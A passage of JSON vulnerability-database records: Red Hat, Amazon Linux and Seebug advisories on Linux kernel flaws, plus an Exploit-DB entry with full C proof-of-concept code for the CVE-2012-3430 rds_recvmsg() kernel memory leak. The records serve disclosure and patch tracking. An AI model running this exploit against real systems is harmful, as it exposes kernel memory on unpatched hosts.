network card could\nrepeatedly reset itself. A remote attacker could use this flaw to cause a\ndenial of service. (CVE-2012-3412, Important)\n\nRed Hat would like to thank Ben Hutchings of Solarflare (tm) for reporting\nthis issue.\n\nThis update also fixes the following bugs:\n\n* In the hpet_next_event() function, an interrupt could have occurred\nbetween the read and write of the HPET (High Precision Event Timer) and the\nvalue of HPET_COUNTER was then beyond that being written to the comparator\n(HPET_Tn_CMP). Consequently, the timers were overdue for up to several\nminutes. Now, a comparison is performed between the value of the counter\nand the comparator in the HPET code. If the counter is beyond the\ncomparator, the \"-ETIME\" error code is returned, which fixes this bug.\n(BZ#855280)\n\n* Traffic to the NFS server could trigger a kernel oops in the\nsvc_tcp_clear_pages() function. The source code has been modified, and the\nkernel oops no longer occurs in this scenario. (BZ#856104)\n\n* A kernel oops occurred in the nf_nat code when a bogus pointer was\ndereferenced in the nf_conn_nat structure. Consequently, if Source Network\nAddress Translation (SNAT) was performed, incorrect information could be\nreceived by other CTS (Clear to Send) signals. A conntrack entry is now\nplaced in the source hash after SNAT has been completed, which prevents the\ndescribed problems. (BZ#865714)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to resolve these issues. The system must be rebooted for this\nupdate to take effect.\n", "modified": "2016-05-19T22:09:32", "published": "2012-11-06T05:00:00", "id": "RHSA-2012:1430", "href": "https://access.redhat.com/errata/RHSA-2012:1430", "type": "redhat", "title": "(RHSA-2012:1430) Important: kernel security and bug fix update", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T19:41:24", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue:\n\n* A flaw was found in the way socket buffers (skb) requiring TSO (TCP\nsegment offloading) were handled by the sfc driver. If the skb did not fit\nwithin the minimum-size of the transmission queue, the network card could\nrepeatedly reset itself. A remote attacker could use this flaw to cause a\ndenial of service. (CVE-2012-3412, Important)\n\nRed Hat would like to thank Ben Hutchings of Solarflare (tm) for reporting\nthis issue.\n\nThis update also fixes several bugs. Documentation for these changes will\nbe available shortly from the Technical Notes document linked to in the\nReferences section.\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct this issue, and fix the bugs noted in the Technical\nNotes. The system must be rebooted for this update to take effect.\n", "modified": "2018-06-06T20:24:22", "published": "2012-10-16T04:00:00", "id": "RHSA-2012:1366", "href": "https://access.redhat.com/errata/RHSA-2012:1366", "type": "redhat", "title": "(RHSA-2012:1366) Important: kernel security and bug fix update", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-04T06:03:54", "bulletinFamily": "exploit", "description": "Linux Kernel 2.6.x 'rds_recvmsg()' Function Local Information Disclosure Vulnerability. CVE-2012-3430. Local exploit for linux platform", "modified": "2012-07-26T00:00:00", "published": "2012-07-26T00:00:00", "id": "EDB-ID:37543", "href": "https://www.exploit-db.com/exploits/37543/", "type": "exploitdb", "title": "Linux Kernel 2.6.x 'rds_recvmsg' Function Local Information Disclosure Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/54702/info\r\n\r\nThe Linux kernel is prone to a local information-disclosure vulnerability.\r\n\r\nLocal attackers can exploit this issue to obtain sensitive information that may lead to further attacks. \r\n\r\n/***************** rds_client.c ********************/\r\n\r\nint main(void)\r\n{\r\nint sock_fd;\r\nstruct sockaddr_in serverAddr;\r\nstruct sockaddr_in toAddr;\r\nchar recvBuffer[128] = \"data from client\";\r\nstruct msghdr msg;\r\nstruct iovec iov;\r\n\r\nsock_fd = socket(AF_RDS, SOCK_SEQPACKET, 0);\r\nif (sock_fd < 0) {\r\nperror(\"create socket error\\n\");\r\nexit(1);\r\n}\r\n\r\nmemset(&serverAddr, 0, sizeof(serverAddr));\r\nserverAddr.sin_family = AF_INET;\r\nserverAddr.sin_addr.s_addr = inet_addr(\"127.0.0.1\");\r\nserverAddr.sin_port = htons(4001);\r\n\r\nif (bind(sock_fd, (struct sockaddr*)&serverAddr, sizeof(serverAddr)) < 0) {\r\nperror(\"bind() error\\n\");\r\nclose(sock_fd);\r\nexit(1);\r\n}\r\n\r\nmemset(&toAddr, 0, sizeof(toAddr));\r\ntoAddr.sin_family = AF_INET;\r\ntoAddr.sin_addr.s_addr = inet_addr(\"127.0.0.1\");\r\ntoAddr.sin_port = htons(4000);\r\nmsg.msg_name = &toAddr;\r\nmsg.msg_namelen = sizeof(toAddr);\r\nmsg.msg_iov = &iov;\r\nmsg.msg_iovlen = 1;\r\nmsg.msg_iov->iov_base = recvBuffer;\r\nmsg.msg_iov->iov_len = strlen(recvBuffer) + 1;\r\nmsg.msg_control = 0;\r\nmsg.msg_controllen = 0;\r\nmsg.msg_flags = 0;\r\n\r\nif (sendmsg(sock_fd, &msg, 0) == -1) {\r\nperror(\"sendto() error\\n\");\r\nclose(sock_fd);\r\nexit(1);\r\n}\r\n\r\nprintf(\"client send data:%s\\n\", recvBuffer);\r\n\r\nmemset(recvBuffer, '\\0', 128);\r\n\r\nmsg.msg_name = &toAddr;\r\nmsg.msg_namelen = sizeof(toAddr);\r\nmsg.msg_iov = &iov;\r\nmsg.msg_iovlen = 1;\r\nmsg.msg_iov->iov_base = recvBuffer;\r\nmsg.msg_iov->iov_len = 128;\r\nmsg.msg_control = 0;\r\nmsg.msg_controllen = 0;\r\nmsg.msg_flags = 0;\r\nif (recvmsg(sock_fd, &msg, 0) == -1) {\r\nperror(\"recvmsg() error\\n\");\r\nclose(sock_fd);\r\nexit(1);\r\n}\r\n\r\nprintf(\"receive data from server:%s\\n\", recvBuffer);\r\n\r\nclose(sock_fd);\r\n\r\nreturn 0;\r\n}\r\n\r\n/***************** rds_server.c ********************/\r\n\r\nint main(void)\r\n{\r\nstruct sockaddr_in fromAddr;\r\nint sock_fd;\r\nstruct sockaddr_in serverAddr;\r\nunsigned int addrLen;\r\nchar recvBuffer[128];\r\nstruct msghdr msg;\r\nstruct iovec iov;\r\n\r\nsock_fd = socket(AF_RDS, SOCK_SEQPACKET, 0);\r\nif(sock_fd < 0) {\r\nperror(\"create socket error\\n\");\r\nexit(0);\r\n}\r\n\r\nmemset(&serverAddr, 0, sizeof(serverAddr));\r\nserverAddr.sin_family = AF_INET;\r\nserverAddr.sin_addr.s_addr = inet_addr(\"127.0.0.1\");\r\nserverAddr.sin_port = htons(4000);\r\nif (bind(sock_fd, (struct sockaddr*)&serverAddr, sizeof(serverAddr)) < 0) {\r\nperror(\"bind error\\n\");\r\nclose(sock_fd);\r\nexit(1);\r\n}\r\n\r\nprintf(\"server is waiting to receive data...\\n\");\r\nmsg.msg_name = &fromAddr;\r\n\r\n/*\r\n * I add 16 to sizeof(fromAddr), ie 32,\r\n * and pay attention to the definition of fromAddr,\r\n * recvmsg() will overwrite sock_fd,\r\n * since kernel will copy 32 bytes to userspace.\r\n *\r\n * If you just use sizeof(fromAddr), it works fine.\r\n * */\r\nmsg.msg_namelen = sizeof(fromAddr) + 16;\r\n/* msg.msg_namelen = sizeof(fromAddr); */\r\nmsg.msg_iov = &iov;\r\nmsg.msg_iovlen = 1;\r\nmsg.msg_iov->iov_base = recvBuffer;\r\nmsg.msg_iov->iov_len = 128;\r\nmsg.msg_control = 0;\r\nmsg.msg_controllen = 0;\r\nmsg.msg_flags = 0;\r\n\r\nwhile (1) {\r\nprintf(\"old socket fd=%d\\n\", sock_fd);\r\nif (recvmsg(sock_fd, &msg, 0) == -1) {\r\nperror(\"recvmsg() error\\n\");\r\nclose(sock_fd);\r\nexit(1);\r\n}\r\nprintf(\"server received data from client:%s\\n\", recvBuffer);\r\nprintf(\"msg.msg_namelen=%d\\n\", msg.msg_namelen);\r\nprintf(\"new socket fd=%d\\n\", sock_fd);\r\nstrcat(recvBuffer, \"--data from server\");\r\nif (sendmsg(sock_fd, &msg, 0) == -1) {\r\nperror(\"sendmsg()\\n\");\r\nclose(sock_fd);\r\nexit(1);\r\n}\r\n}\r\n\r\nclose(sock_fd);\r\nreturn 0;\r\n}\r\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/37543/"}], "seebug": [{"lastseen": "2017-11-19T17:49:44", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 54702\r\nCVE ID: CVE-2012-3430\r\n\r\nLinux Kernel\u662fLinux\u64cd\u4f5c\u7cfb\u7edf\u7684\u5185\u6838\u3002\r\n\r\nLinux Kernel\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u672c\u5730\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u9020\u6210\u4fe1\u606f\u6cc4\u9732\u3002\r\n0\r\nLinux kernel 2.6.x\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nLinux\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.kernel.org/", "modified": "2012-07-27T00:00:00", "published": "2012-07-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60297", "id": "SSV:60297", "type": "seebug", "title": "Linux kernel 2.6.x 'rds_recvmsg()'\u51fd\u6570\u672c\u5730\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e", "sourceData": "", "sourceHref": "", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "amazon": [{"lastseen": "2018-10-02T16:55:08", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nThe rds_recvmsg function in net/rds/recv.c in the Linux kernel before 3.0.44 does not initialize a certain structure member, which allows local users to obtain potentially sensitive information from kernel stack memory via a (1) recvfrom or (2) recvmsg system call on an RDS socket.\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. You will need to reboot your system in order for the new kernel to be running.\n\n \n\n\n**New Packages:**\n \n \n i686: \n kernel-tools-debuginfo-3.2.28-45.62.amzn1.i686 \n kernel-3.2.28-45.62.amzn1.i686 \n kernel-debuginfo-common-i686-3.2.28-45.62.amzn1.i686 \n kernel-devel-3.2.28-45.62.amzn1.i686 \n kernel-headers-3.2.28-45.62.amzn1.i686 \n kernel-tools-3.2.28-45.62.amzn1.i686 \n kernel-debuginfo-3.2.28-45.62.amzn1.i686 \n \n noarch: \n kernel-doc-3.2.28-45.62.amzn1.noarch \n \n src: \n kernel-3.2.28-45.62.amzn1.src \n \n x86_64: \n kernel-tools-3.2.28-45.62.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-3.2.28-45.62.amzn1.x86_64 \n kernel-devel-3.2.28-45.62.amzn1.x86_64 \n kernel-headers-3.2.28-45.62.amzn1.x86_64 \n kernel-debuginfo-3.2.28-45.62.amzn1.x86_64 \n kernel-tools-debuginfo-3.2.28-45.62.amzn1.x86_64 \n kernel-3.2.28-45.62.amzn1.x86_64 \n \n \n", "modified": "2014-09-14T16:51:00", "published": "2014-09-14T16:51:00", "id": "ALAS-2012-118", "href": "https://alas.aws.amazon.com/ALAS-2012-118.html", "title": "Medium: kernel", "type": "amazon", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}]}
